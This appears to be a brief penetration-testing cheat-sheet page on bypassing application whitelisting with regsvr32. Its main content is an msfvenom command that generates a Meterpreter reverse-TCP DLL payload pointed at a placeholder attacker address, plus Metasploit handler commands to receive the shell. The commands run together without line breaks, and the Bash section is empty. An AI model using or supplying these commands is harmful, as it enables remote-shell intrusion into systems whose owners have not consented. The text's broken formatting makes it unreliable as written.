Application Whitelisting Bypass
Application Whitelisting Bypass
Tools: regsvr32, Bash
REGSVR32
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACK_IP LPORT=PORT -f dll -a x86 > example.dllmsfconsole -quse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST IPset LPORT PORTBASH
Last updated